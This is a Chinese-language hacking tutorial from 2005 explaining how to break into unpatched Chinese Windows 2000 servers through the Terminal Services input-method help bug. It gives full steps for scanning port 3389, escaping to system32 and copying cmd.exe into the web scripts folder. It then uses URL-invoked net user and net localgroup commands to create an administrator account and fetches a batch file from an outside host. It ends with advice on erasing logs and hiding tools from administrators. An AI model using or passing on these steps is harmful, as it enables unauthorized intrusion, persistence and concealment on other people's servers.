| 利用输入法入侵 |
| 责任编辑:admin 更新日期:2005-7-6 |
|
|
利用输入法入侵 (04.30) 对于入侵一个服务器而言,NT和2000当然是
首选。相信大家都看过一篇叫做“我们该为千疮百孔的NT做点什么这篇文章了吧”。呵呵~~内容
不说了,看文章的名字吧!的确如此NT和2000的漏洞多得数不清呀!!!好了,这都是题外话
了。进入正题吧: 相信大家都听说过WIN2000的一种最大的漏洞吧——输入法(3389)漏洞。不
管你是有什么系统,只要你找到一个没打补丁的中文版的WIN2000,并且开放3389端口(即终端服
务)的话,你,就可以在他的机子上随便乱跳。为所欲为,就好像在本地操作一样。似乎该漏洞
只对国内的机子有用,而且有50%以上的机子没有下载补丁!由于可见国内的网络安全系
数!!! 所需软件:端口扫描工具(随便,但建议使用可以定义端口,对IP段进行扫描的扫描工
具,如:SuperScan)和终端服务客户端。 第一步:先对某个IP段进行扫描,端口定义为3389。
小窍门:先把某个网站的IP找出来,如: pinghttp://www.xxx.xxx.com/ ==èIP:202.100.1.1
然后再把扫描IP段设为:202.100.1.1==è202.100.1.225,这样一旦你扫到,就会扫到一大把:)
嘻嘻…… 好了,现在把你扫到的IP保存起来。然后呢,把你的终端服务客户端打开,把IP址COPY
进去!然后呢,嘿嘿~~很快出现一个WIN2000的登陆界面。把光标放到输入用户名的框中,然后按
Shift+Ctrl键切换输入法。(如果你按了N次,都没反映的话,嘿,那就是没得完了,因为可能网
管把所有的输入法都给DEL掉了,再换过另一个IP吧。)哇~~换了N个IP后,终于找到一个,哎~~~
好累呀……没关系,等一下你就觉得好玩了。呵呵~~ 把输入法换为“全拼”,再看看屏幕的左下
方(是在终端服务客户端的界面,也就是WIN2000的界面里)别在你自己的界面里找呀:)看到输
入法状态框了吗?呵呵~~鼠标右键点它——帮助(如果此时你看到的帮助是灰色的,那就放弃
吧,因为——已经下补丁了,没得搞)——输入法指南,看到弹出来帮助界面了吗?到现在为
止,这个机子可以说已经在你的手掌心里了。为什么?接着看! 本人见过关于这个漏洞利用的几
种方法,现在全部把它列出来。 一、用右键点弹出的帮助界面上的“选项”,——“直接跳转到
URL”,又弹出一个对话框,在空白处写上“C:\winnt\system32”,回车,你现在所在的位置
就是system32这个文件夹里了:)看到了什么?“C:\winnt\system32”,这个是要根据具体情况
而决定的,如果它的2000是装在D或者E盘,那你用“C:\winnt\system32”,看到的当然是“该页
无法显示”啦。现在system32下的cmd.exe 复制到c:\inetpub\scripts目录下。呵呵~~打开IE
吧,在IE里打http://www.xxx.xxx.com/scripts/cmd.exe?/c+dir 现在你看到的是什么?明白
了吗?好,再接着,就在IE上做动作吧。
http://www.xxx.xxx.com/scripts/cmd.exe?/c+net+user+guest+hacker+/active:yes>tomychen.
bat (因为Guest用户已经存在,现在只是把它击活。)
http://www.xxx.xxx.com/scripts/cmd.exe?/c+net+localgroup+administrators+guest+/add>>t
omychen.bat (把GUEST用户添加到administrators用户组中) 再用
http://www.xxx.xxx.com/scripts/cmd.exe?/c+dir 命令看一下,怎么?多了一个
tomychen.bat?呵呵~~是呀,多了一个:)现在再回到终端服务客户端的界面中(可能经过这么
长的时间,已经断开了,别怕,再连嘛:)进入c:\inetpbut\scripts目录,执行tomychen.bat文
件。大功告成:关掉帮助界面,用GUEST用户、密码:HACKER登陆,哇~~~看到了什么???爽
吧?下载一个软件看看~~~~哇速度比56K猫快多了。哈哈~~~ 二、用net.exe。同上,一样要进入
到c:\winnt\sysytem32目录下,把net.exe找出来,然后创建一个快捷方式,再用鼠标右键点击快
捷方式——属性。好了,然后再目标位置写上net user guest hacker /active:yes先运行后再用
同样的方法写上net loaclgroup administrators guest /add再运行。OK,一切搞定,关掉帮
助。用guest 用户、密码:hacker登陆。怎么样?一切是不是都很简单? 三、这是本人无意间发
现的一种菜方法,虽菜,但很好用:)嘻嘻……。就是先用记事本写一个*.bat文件,格式如
下: net user guest hacker /active:yes net localgroup administrators guest /add 保存
后,放到一个FTP服务器上。什么?没有?到网易申请一个,马上开通:)哈哈。这具文件上传到
服务器后。哼哼~~嘿嘿~~够奸了吧~~用同样方法打开帮助界面,只是在跳转到URL时,把你上传的
BAT文件的地址写进去,然后会出现一个IE的下载界面,选“在当前位置打开”。那么……不用我
说了?如果谁懒得写BAT或者,懒得申请空间的话,可以用本人写好的
http://go2.163.com/~tomylee/hack/tomy.bat 用户为:guest 密码:000。 如果大家不想用
GUEST用户的话,可以自己加别的用户如: net user hacker hacker /add(添加用户“HACKER”
密码为“HACKER“) net user hacker /active:yes (击活HACKER用户) net loacalgroup
administrators hacker /add (将“HACKER”用户加到administrator用户组) 就这么简单,当
然,你还可以加入del c:\winnt\system32\logfile\*.* 等……但是这一做法不太好,因为这
样,等于告诉管理员,这个服务器被入侵了。还是用榕哥的IP去除工具比较好。还有就是你进去
后把所有硬盘看一下,找一个大点的盘,新建一个文件夹,下载喜欢用的黑客工具放到里
面:),然后,就把这个的属性改为“隐藏”呵呵~~还有就是,如果你下载某个工具是要安装
的,而且安装后还会在开始菜单中出现的话,那么~~嘿嘿~~把它删了最好或者隐藏掉。还有要告
诉各位的是:你的黑软不要下得太多,或者下那些太大的。不然,管理员看到硬盘空间大小和存
放的东东相差太远的话,那就…… 好了,这样,你就完成了一次入侵!  |
|
| 上一篇文章: unicode漏洞利用全攻略 |
| 下一篇文章: 输入法漏洞之完全心得及问题 |
|
|
|
|
